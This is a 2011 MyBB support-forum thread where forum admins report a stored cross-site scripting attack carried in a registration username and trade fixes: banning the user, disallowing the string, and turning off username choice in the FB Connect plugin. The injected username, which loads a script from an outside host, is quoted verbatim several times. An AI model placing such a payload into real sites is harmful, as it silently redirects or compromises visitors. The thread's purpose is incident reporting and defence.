MyBB Community Forums

Full Version: Security Flaw In Registrations / Usernames
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
http://www.dashingforums.com

So about an hour ago I had a member successfully register with the following username:

Andre Dejavu</noscript><script src="http://surabayag3tar.x4host.eu/"></script>

The Javascript was accepted and the username was accepted. This lead to any page mentioning his username (such as the index because they were the newest member, their profile page, and the user page in the Admin CP) redirecting to the site sourced in the script.

Screenshot:
[Image: ae1xmc.jpg]

For other people experiencing the same, this is how I resolved the issue:
1) Banned member:
Andre Dejavu</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
2) Downloaded NoScripts (Chrome Extension). I suspect NoScript for Firefox would work as well but I have not confirmed this.
3) With NoScripts enabled, I was able to edit the username so that the script was no longer present (so the member is now 'Andre Dejavu').
4) Added the following to disallowed usernames (haven't tested yet):
*</noscript><script src="http://surabayag3tar.x4host.eu/"></script>


The guy is bragging about other hacks on his Facebook page, but I'm not sure how many of those are using the MyBB software:
https://www.facebook.com/specialone.andre


Anyway, I hope my information was clear and that you can find a solution to prevent this in the future. It wasn't the worst of attacks, but the fact that it was so simple to pull off astounds me.

Hope to hear from you guys soon,
- Fanta
It just happened to me, and this will help people. Seems to be the FB Connect plugin.

Might be worth adding too; even if you delete the user he still may appear as the latest registered user on your forum index, so go back into the ACP and create a new user. That is what i needed to do.
(2011-11-29, 01:13 PM)david42 Wrote: [ -> ]It just happened to me, and this will help people. Seems to be the FB Connect plugin.

Might be worth adding too; even if you delete the user he still may appear as the latest registered user on your forum index, so go back into the ACP and create a new user. That is what i needed to do.
This is why I removed the script from the username. I had NoScripts enabled so that the script wouldn't be executed while doing this.
And setting max username characters to 25 in the ACP, as well as installing this plugin should help: http://mybbhacks.zingaburga.com/showthread.php?tid=261

temp

its a good tutorail by this autothor mods move it to tutorial useful for many Smile
I don't think it's possible to create a user like that, by default, in MyBB. As david42 mentions, you might want to point this out to the author of the FB Connect plugin.

temp

yes only fb connect sites are getting by this methord,nayar's fb connect is the only thing,he told to disable it till he write a solution for it.
Were you using FBConnect plugin? Tomm, I guess adding </noscript> to banned usernames would do?
(2011-11-29, 01:23 PM)temp Wrote: [ -> ]yes only fb connect sites are getting by this methord,nayar's fb connect is the only thing,he told to disable it till he write a solution for it.

solution very easy
go to ur ACP >> configuration >> FBConnect >> Allow choosing of username

set it NO
(2011-11-29, 01:25 PM)crazy4cs Wrote: [ -> ]Tomm, I guess adding </noscript> to banned usernames would do?

As long as the plugin honors the datahandler, it should do.
Pages: 1 2